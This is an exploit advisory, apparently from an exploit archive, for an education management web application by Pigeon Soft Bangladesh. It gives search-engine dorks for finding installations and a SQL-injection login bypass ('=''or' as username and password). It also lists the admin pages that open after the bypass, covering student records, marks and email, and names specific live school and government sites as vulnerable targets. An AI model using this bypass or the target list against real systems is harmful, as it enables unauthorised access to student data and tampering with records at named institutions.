#################################################################################################
# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Developed By Pigeon Soft'' site:bd
intext:''Powered By Pigeon Soft'' site:bd
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ]
#################################################################################################
# Admin Panel Login Path :
/app/login.php
/wp-login.php
# Authentication Bypass Exploit :
Admin Username : '=''or'
Admin Password : '=''or'
/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php
#################################################################################################
# Example Vulnerable Sites =>
[+] bograpoly.gov.bd/app/index.php
[+] gmmhs.edu.bd/app/login.php
[+] gfisc.edu.bd/app/login.php
[+] itihasacademybd.com/app/login.php
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################